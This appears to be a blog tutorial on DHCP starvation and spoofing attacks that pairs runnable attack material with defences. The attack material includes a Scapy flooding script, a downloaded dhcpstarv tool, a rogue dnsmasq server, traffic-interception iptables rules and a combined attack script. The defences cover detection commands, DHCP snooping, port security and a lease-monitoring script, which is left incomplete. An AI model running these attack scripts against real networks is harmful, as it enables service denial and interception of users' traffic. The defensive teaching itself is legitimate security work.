DHCP Starvation and Spoofing Attacks: How to Exploit and Secure Dynamic Host Configuration Protocol
DHCP attacks represent some of the most effective yet underestimated network vulnerabilities in modern cybersecurity. By targeting the Dynamic Host Configuration Protocol that automatically assigns IP addresses to network devices, attackers can intercept traffic, redirect communications, and gain unauthorized network access. This comprehensive guide will walk you through understanding, executing, and defending against DHCP starvation and spoofing attacks.
The Dynamic Host Configuration Protocol (DHCP) is the backbone of modern network connectivity, automatically assigning IP addresses, subnet masks, gateways, and DNS servers to devices joining a network. However, this convenience comes with inherent security risks that cybersecurity professionals must understand to protect their infrastructure effectively.
Understanding DHCP Fundamentals and Attack Vectors
Before diving into attack methodologies, it's crucial to understand how DHCP operates. When a device connects to a network, it broadcasts a DHCP Discover message. The DHCP server responds with a DHCP Offer, containing available IP configuration. The client then sends a DHCP Request, and finally, the server confirms with a DHCP Acknowledge.
This four-step handshake process creates two primary attack opportunities:
- DHCP Starvation: Exhausting the DHCP server's IP address pool by requesting all available addresses
- DHCP Spoofing: Setting up a rogue DHCP server to provide malicious network configurations
- Combined Attacks: Using starvation to disable legitimate DHCP services, then deploying a spoofed server
These attacks are particularly dangerous because they operate at the network layer, affecting all devices attempting to connect, and can be executed with minimal technical requirements.
Executing DHCP Starvation Attacks
DHCP starvation attacks work by overwhelming the DHCP server with requests using fabricated MAC addresses, consuming all available IP addresses in the pool. Once the pool is exhausted, legitimate clients cannot obtain network configurations.
Prerequisites and Tools
For educational and authorized testing purposes, you'll need:
- A Linux-based system (Kali Linux recommended)
- Network access to the target DHCP server
- Administrative privileges on your testing machine
- Tools like yersinia, dhcpstarv, or scapy
Method 1: Using Yersinia
Yersinia is a powerful network attack framework that includes DHCP attack capabilities. Install and execute a starvation attack:
sudo apt update && sudo apt install yersinia
# Launch yersinia in interactive mode
sudo yersinia -I
# Select DHCP protocol (press 'd')
# Choose 'sending discover packet' (press '1')
# Set the attack to run continuously
Method 2: Using DHCPStarv
DHCPStarv is a specialized tool designed specifically for DHCP starvation attacks:
# Download and compile dhcpstarv
wget http://www.netpatch.ru/dhcpstarv.c
gcc dhcpstarv.c -o dhcpstarv
# Execute the attack
sudo ./dhcpstarv -i eth0
Method 3: Custom Scapy Script
For more control and learning purposes, create a custom Python script using Scapy:
#!/usr/bin/env python3
from scapy.all import *
import random
def dhcp_starvation(interface):
for i in range(254):
# Generate random MAC address
mac = "02:00:00:%02x:%02x:%02x" % (
random.randint(0, 255),
random.randint(0, 255),
random.randint(0, 255)
)
# Create DHCP discover packet
discover = Ether(dst="ff:ff:ff:ff:ff:ff", src=mac) / \
IP(src="0.0.0.0", dst="255.255.255.255") / \
UDP(sport=68, dport=67) / \
BOOTP(chaddr=mac) / \
DHCP(options=[("message-type", "discover"), "end"])
sendp(discover, iface=interface, verbose=0)
print(f"Sent DHCP discover with MAC: {mac}")
# Execute the attack
dhcp_starvation("eth0")
DHCP Spoofing Attacks and Rogue Server Deployment
DHCP spoofing involves creating a malicious DHCP server that responds to client requests faster than the legitimate server, providing attacker-controlled network configurations. This enables man-in-the-middle attacks, traffic redirection, and credential harvesting.
Setting Up a Rogue DHCP Server
Using dnsmasq, you can quickly deploy a rogue DHCP server:
# Install dnsmasq
sudo apt install dnsmasq
# Create configuration file
sudo nano /etc/dnsmasq.conf
# Add these configurations:
interface=eth0
dhcp-range=192.168.1.100,192.168.1.200,12h
dhcp-option=3,192.168.1.1 # Gateway (your machine)
dhcp-option=6,8.8.8.8 # DNS server
dhcp-authoritative
# Start the rogue server
sudo systemctl start dnsmasq
Advanced Spoofing with Traffic Interception
To maximize the attack's effectiveness, enable IP forwarding and set up traffic capturing:
# Enable IP forwarding
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
# Set up iptables rules for traffic capture
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
sudo iptables -A FORWARD -i eth1 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
# Monitor intercepted traffic
sudo tcpdump -i eth0 -w captured_traffic.pcap
Combining Starvation and Spoofing
The most effective approach combines both techniques. First, execute a starvation attack to disable the legitimate DHCP server, then immediately deploy your rogue server:
#!/bin/bash
echo "Starting DHCP starvation attack..."
sudo ./dhcpstarv -i eth0 &
STARV_PID=$!
sleep 30 # Allow time for starvation
echo "Starting rogue DHCP server..."
sudo systemctl start dnsmasq
echo "Attack initiated. Monitor with: sudo tcpdump -i eth0"
echo "Stop starvation with: kill $STARV_PID"
Detection and Monitoring Techniques
Recognizing DHCP attacks requires continuous monitoring and understanding of normal network behavior. Several indicators can reveal ongoing attacks:
Network Monitoring Commands
Monitor DHCP traffic patterns using various tools:
# Monitor DHCP packets specifically
sudo tcpdump -i eth0 port 67 or port 68
# Check DHCP lease table for unusual patterns
sudo cat /var/lib/dhcp/dhcpd.leases | grep "binding state active" | wc -l
# Monitor network traffic for multiple DHCP servers
sudo nmap --script broadcast-dhcp-discover
Log Analysis
Examine system logs for DHCP-related anomalies:
# Check DHCP server logs
sudo grep -i dhcp /var/log/syslog
# Look for rapid lease exhaustion
sudo journalctl -u isc-dhcp-server | grep -i "no free leases"
# Monitor for duplicate DHCP offers
sudo tcpdump -i eth0 -c 100 port 67 | grep -c "DHCP-Message Option 53, length 1: Offer"
Comprehensive Defense Strategies
Protecting against DHCP attacks requires a multi-layered approach combining network configuration, monitoring, and access controls.
DHCP Snooping Implementation
DHCP snooping is the most effective defense mechanism, creating a security boundary between trusted and untrusted network segments:
# Cisco switch DHCP snooping configuration
Switch(config)# ip dhcp snooping
Switch(config)# ip dhcp snooping vlan 1-100
Switch(config)# interface gigabitethernet0/1
Switch(config-if)# ip dhcp snooping trust
Switch(config-if)# exit
Switch(config)# ip dhcp snooping database flash:dhcp_snooping.db
Port Security Configuration
Implement port security to limit MAC address learning and prevent starvation attacks:
# Configure port security on access ports
Switch(config)# interface range gigabitethernet0/2-24
Switch(config-if-range)# switchport mode access
Switch(config-if-range)# switchport port-security
Switch(config-if-range)# switchport port-security maximum 3
Switch(config-if-range)# switchport port-security violation shutdown
Switch(config-if-range)# switchport port-security mac-address sticky
Network Segmentation and VLANs
Proper network segmentation limits attack scope:
# Create separate VLANs for different device types
Switch(config)# vlan 10
Switch(config-vlan)# name SERVERS
Switch(config-vlan)# vlan 20
Switch(config-vlan)# name WORKSTATIONS
Switch(config-vlan)# vlan 30
Switch(config-vlan)# name GUESTS
# Configure DHCP pools per VLAN
Router(config)# ip dhcp pool SERVERS
Router(dhcp-config)# network 10.1.10.0 255.255.255.0
Router(dhcp-config)# default-router 10.1.10.1
Monitoring and Alerting Systems
Implement automated monitoring to detect attacks in real-time:
#!/bin/bash
# DHCP monitoring script
LEASE_FILE="/var/lib/dhcp/dhcpd.leases"
THRESHOLD=90 # Alert when 90% of leases are used
TOTAL_POOL=200
while true; do
ACTIVE_LEASES=$(grep "binding state active" $LEASE_FILE | wc -l)
USAGE_PERCENT=$((ACTIVE_LEASES * 100 / TOTAL_POOL))
if [ $USAGE_PERCENT -gt $THRESHOLD ]; then
echo "ALERT: DHCP pool usage at ${USAGE_PERCENT}%" | \
mail -s "DHCP Pool Warning" admin@company.com
fi
Want more cybersecurity tutorials delivered to your inbox?
Subscribe Free →